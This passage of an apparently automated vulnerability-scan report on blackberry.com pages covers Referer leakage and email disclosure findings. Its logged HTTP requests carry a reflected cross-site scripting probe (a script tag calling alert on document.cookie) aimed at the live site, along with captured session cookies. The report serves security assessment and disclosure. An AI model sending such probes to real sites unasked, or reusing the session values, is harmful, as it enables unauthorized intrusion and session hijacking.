Set-Cookie: JSESSIONID=66D006BE4D3250DFD92B5AD2B57EA78B; Path=/btsc
Content-Length: 37220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title>BlackBerr
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /btsc/microsites/search.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /btsc/microsites/search.do?91733%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95980e881b2=1 HTTP/1.1
Host: www.blackberry.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=66D006BE4D3250DFD92B5AD2B57EA78B; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; CP=null*; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_nr=1290621174762; BIGipServerBTSC_KSS1_80=2792964362.20480.0000; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=900790984269; s_sv_p1=1@16@d/2210/2334&e/11; s_sv_s1=1@16@a//1290649905097

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 00:59:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=UTF-8
Content-Length: 132324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>BlackBerry Technica
...[SNIP]...
<td class="body12">
       <a href="http://www.youtube.com/BlackBerry">        Official BlackBerry YouTube Channel
       </a>
...[SNIP]...
<td class="body12">
       <a href="http://www.twitter.com/blackberryhelp">        Twitter
       </a>
...[SNIP]...

4. Email addresses disclosed  previous
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. http://www.blackberry.com/btsc/microsites/js//js/custom_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /btsc/microsites/js//js/custom_functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /btsc/microsites/js//js/custom_functions.js HTTP/1.1
Host: www.blackberry.com
Proxy-Connection: keep-alive
Referer: http://www.blackberry.com/btsc/microsites/search.do?91733%22%3E%3Cscript%3Ealert(1)%3C/script%3E95980e881b2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=532E4999CCE84020C9FCCE399492FAAC; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; CP=null*; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_nr=1290621174762; s_sv_p1=1@16@d/2210/2334&e/10; BIGipServerBTSC_KSS1_80=2792964362.20480.0000

Response

HTTP/1.1 404 /btsc/microsites/js//js/custom_functions.js
Date: Thu, 25 Nov 2010 00:59:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=66D006BE4D3250DFD92B5AD2B57EA78B; Path=/btsc
Content-Length: 37220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title>BlackBerr
...[SNIP]...
<a href="mailto:webmaster@blackberry.net">webmaster@blackberry.net</a>
...[SNIP]...

4.2. http://www.blackberry.com/btsc/microsites/js//js/main.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /btsc/microsites/js//js/main.js

Issue detail

The following email address was disclosed in the response:

Request

GET /btsc/microsites/js//js/main.js HTTP/1.1
Host: www.blackberry.com
Proxy-Connection: keep-alive
Referer: http://www.blackberry.com/btsc/microsites/search.do?91733%22%3E%3Cscript%3Ealert(1)%3C/script%3E95980e881b2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=66D006BE4D3250DFD92B5AD2B57EA78B; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; CP=null*; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_nr=1290621174762; s_sv_p1=1@16@d/2210/2334&e/10; BIGipServerBTSC_KSS1_80=2792964362.20480.0000

Response

HTTP/1.1 404 /btsc/microsites/js//js/main.js
Date: Thu, 25 Nov 2010 00:59:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=UTF-8
Content-Length: 37180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title>BlackBerr
...[SNIP]...
<a href="mailto:webmaster@blackberry.net">webmaster@blackberry.net</a>
...[SNIP]...

Report generated by XSS.CX at Wed Nov 24 19:58:21 CST 2010.